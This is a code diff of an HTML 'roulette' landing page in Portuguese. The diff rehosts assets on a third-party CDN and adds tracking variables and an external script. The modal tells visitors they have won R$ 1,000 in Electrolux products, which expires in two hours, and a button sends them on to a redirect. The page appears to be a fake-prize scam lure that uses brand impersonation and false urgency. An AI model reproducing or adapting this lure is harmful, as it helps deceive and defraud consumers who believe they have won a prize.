--- a/roleta2/index.html
+++ b/roleta2/index.html
@@ -1,17 +1,16 @@
 
-<head>
+<html><head>
     
   <meta charset="utf-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="theme-color" content="#000000">
   <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
   
-  <link rel="stylesheet" href="style.css">
+  <link rel="stylesheet" href="https://c2.cdn1tp.net/1bcd9aff77e94f04877ed9d534aaef02/css/style.css">
   
   <meta http-equiv="Content-Security-Policy" content="frame-ancestors 'self' https://dominio-permitido.com">
 
   
-</head>
 <style>
 /* Estilo para o modal */
 .modal {
@@ -79,6 +78,15 @@
   background-color: #45a049; /* Cor de fundo ao passar o mouse */
 }
 </style>
+            <script>
+                const v_123_pageId = "65f79b102b8b605599d6989c";
+                const v_123_siteId = "65e4bcf3a492963d6524ec68";
+                const v_123_siteType = "HTML";
+                const v_123_slug = null;
+            </script>
+
+            </head>
+
 
 
 <body>
@@ -116,17 +124,17 @@
   </style>
 
   <div class="navbar">
-    <a href="#home"></a>
-    <a href="#news"></a>
-    <a href="#contact"></a>
+    <a href="#home" id="umdoistrestplink1"></a>
+    <a href="#news" id="umdoistrestplink2"></a>
+    <a href="#contact" id="umdoistrestplink3"></a>
   </div>
 <!-- Modal -->
 <div id="myModal" class="modal">
 <!-- Conteúdo do modal -->
 <div class="modal-content">
   
-  <span class="close">&times;</span>
-  <img src="https://static-00.iconduck.com/assets.00/party-popper-emoji-503x512-0vkq9zgo.png" style="width: 30%;"> <br> <br>
+  <span class="close">×</span>
+  <img src="https://c2.cdn1tp.net/1bcd9aff77e94f04877ed9d534aaef02/images/party-popper-emoji-503x512-0vkq9zgo.png" style="width: 30%;"> <br> <br>
   <h2>Parabéns, você ganhou R$ 1.000</h2> <br><br>
   <p>Parabéns, você ganhou R$ 1.000 para usar como quiser nos produtos selecionados da linha Electrolux. Para usá-los, basta clicar no botão abaixo e você será redirecionado para uma página onde seu saldo já está pronto para uso. Esse saldo expira dentro de 2 horas, por isso, é importante que você seja rápido com a sua compra.</p> <br><br>
   <button class="btn">Aproveitar meu prêmio</button>
@@ -187,4 +195,6 @@
     
   }
 </script>
-</body>
+
+                    <script async="true" src="https://c1.cdn1tp.net/ghelper/googletagmanager.js"></script>
+                </body></html>
